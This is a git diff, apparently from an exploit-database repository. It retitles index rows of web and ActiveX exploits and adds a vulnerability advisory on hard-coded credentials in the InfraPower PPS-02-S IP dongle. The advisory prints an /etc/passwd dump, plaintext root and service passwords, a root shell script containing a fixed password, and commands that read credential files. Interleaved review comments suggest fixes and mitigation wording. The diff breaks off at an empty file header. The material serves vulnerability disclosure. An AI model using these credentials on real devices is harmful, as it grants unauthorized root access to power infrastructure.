diff --git a/files.csv b/files.csv
index 36fa74c4d..e6be23fc0 100755
--- a/files.csv
+++ b/files.csv
@@ -4610,53 +4610,53 @@ id,file,description,date,author,platform,type,port
4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0
4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0
4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
-4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
+4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
-4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
-4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
+4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
+4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0
-4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
+4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' Parameter SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
-4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
+4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0
-4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
-4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
-4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0
-4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
-4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0
+4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
+4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
+4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,windows,remote,0
+4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
+4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion",2008-01-23,Stack,php,webapps,0
4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0
4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0
4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0
-4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
-4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
+4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Parameter Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
+4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0
-4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0
+4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' Parameter SQL Injection",2008-01-25,Houssamix,php,webapps,0
4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0
-4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
+4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0
-4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0
+4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps,0
4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0
4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0
-4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
-4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
-4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
-4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
+4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
+4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
+4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
+4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0
4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0
4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0
-5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
-5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0
-5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0
-5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
-5004,platforms/windows/local/5004.c,"SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
+5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
+5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0
+5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' Parameter SQL Injection",2008-01-29,D4m14n,php,webapps,0
+5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
+5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
-5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
-5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
+5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0
5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
@@ -26419,16 +26419,16 @@ id,file,description,date,author,platform,type,port
29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
-29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0
29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0
29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0
@@ -29720,7 +29720,7 @@ id,file,description,date,author,platform,type,port
32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0
32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0
32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
-32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
+32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0
32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0
32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
@@ -36728,6 +36728,13 @@ id,file,description,date,author,platform,type,port
40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0
40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0
40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0
+40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0
+40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0
+40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
+40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple XSS",2016-10-28,LiquidWorm,php,webapps,0
+40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
+40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0
+40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0
40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
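Review bot: The seven InfraPower PPS-02-S rows added in this hunk classify the same device and firmware under two platforms: 40640 and 40643 are filed as `hardware`, while 40641, 40642, 40644, 40645 and 40646 are filed as `php` under `platforms/php/webapps/`. Anyone filtering the index by platform to triage exposure of this appliance will see only part of the set, so I would file all seven under one platform (moving the files accordingly) or document why they differ. The title `Multiple XSS` on 40641 also departs from the spelled-out form this same commit normalises elsewhere (for example 4989, `File Disclosure / Cross-Site Scripting`); `"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting"` would match. The new rows are also not in ascending id order, though other parts of the file are unordered too.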
diff --git a/platforms/hardware/remote/40643.txt b/platforms/hardware/remote/40643.txt
new file mode 100755
index 000000000..b51140711
--- /dev/null
+++ b/platforms/hardware/remote/40643.txt
@@ -0,0 +1,195 @@
+InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from a use of hard-coded credentials. The IP
+dongle firmware ships with hard-coded accounts that can be used to gain
+full system access (root) using the telnet daemon on port 23.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5371
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
+
+
+27.09.2016
+
+--
+
+
+# cat /etc/passwd
+
+root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+adm:x:3:4:adm:/adm:/bin/sh
+lp:x:4:7:lp:/var/spool/lpd:/bin/sh
+sync:x:5:0:sync:/bin:/bin/sync
+shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
+operator:x:11:0:Operator:/var:/bin/sh
+nobody:x:99:99:nobody:/home:/bin/sh
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
+user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
+service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
+www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
+
+# showing accounts in root group:
+
+Username: root
+Password: 8475
+--
+Username: service
+Password: ipdongle
+--
+Username: www
+Password: 9311
+--
+Username: www2
+Password: 9311
+
+# showing other less-privileged accounts:
+
+Username: user
+Password: 8475
+--
+Username: admin
+Password: 8475
+
+--------
+
+/mnt/mtd # echo $SHELL
+/sbin/root_shell.sh
+/mnt/mtd # cat /sbin/root_shell.sh
+#!/bin/sh
+trap "" 2 3 9 24
+
+# check login
+passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
+
+if [ "$passWork" = "1" ]; then
+ login_file=/mnt/mtd/root_login
+ now_timestamp=`date +%s`
+
+ if [ -f $login_file ]; then
+ line=`wc -l $login_file | cut -c 1-9`
+ if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then
+ pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
+ pre_result1=`echo $pre_login | cut -d " " -f 1`
+ pre_result2=`echo $pre_login | cut -d " " -f 2`
+ pre_result3=`echo $pre_login | cut -d " " -f 3`
+ if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
+ pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
+ result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
+ if [ "$result" != "success" ]; then
+ echo $result
+ exit 0
+ fi
+ fi
+ fi
+ fi
+
+ echo -n "password:"
+ read pass
+ if [ "$pass" != "999" ]; then
+ echo "wrong password"
+ echo fail $now_timestamp >> $login_file
+ exit 0
+ fi
+ echo success $now_timestamp >> $login_file
+fi
+
+/bin/sh
+/mnt/mtd #
+
+--------
+
+/mnt/mtd # ls
+IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf
+PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf
+PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log
+
+--------
+
+/mnt/mtd # df -h
+
+Filesystem Size Used Available Use% Mounted on
+tmpfs 256.0M 4.0K 256.0M 0% /tmp
+/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd
+/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1
+/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2
+/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3
+
+--------
+
+/www # ls -al
+
+drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .
+drwxr-xr-x 16 root root 0 Nov 28 11:17 ..
+-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php
+-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php
+-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php
+-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php
+-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php
+-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php
+drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General
+-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php
+-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php
+drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images
+drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript
+-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php
+-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php
+-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php
+-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php
+-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php
+-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php
+-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php
+-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php
+-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php
+-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php
+-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php
+-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php
+-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php
+-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php
+-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php
+-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php
+-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php
+-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php
+-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php
+-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php
+-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php
+-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php
+-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php
+-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php
+-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php
+-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php
+-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php
+-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php
+-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php
+-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh
+-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php
+-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php
+-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php
+
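Review bot: The Desc paragraph covers only the hard-coded accounts reachable over telnet on port 23, but the `/sbin/root_shell.sh` listing shows a second fixed secret (`if [ "$pass" != "999" ]`) that is enforced only when `RootPassEnable` is `1` in `/mnt/mtd/main_conf`, and that gate deserves its own sentence. The passwd dump also shows `service`, `www` and `www2` running with UID 0, and the same hash string shared by `root`, `admin` and `user` and again by `www` and `www2`; stating this in prose would save readers from inferring it from the listing. The header names a fixed version but gives no remediation, so I would add a line such as `Mitigation: upgrade to Q216V3 (IPD-02-FW-v03); until then block TCP/23 to the dongle and keep it on an isolated management network.` Typos in the added text (`Vulnerabiliy`, `efficient cient`) could be fixed in the same pass if the entry is not required to mirror the upstream advisory byte for byte.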
diff --git a/platforms/hardware/webapps/40640.txt b/platforms/hardware/webapps/40640.txt
new file mode 100755
index 000000000..fdd37727d
--- /dev/null
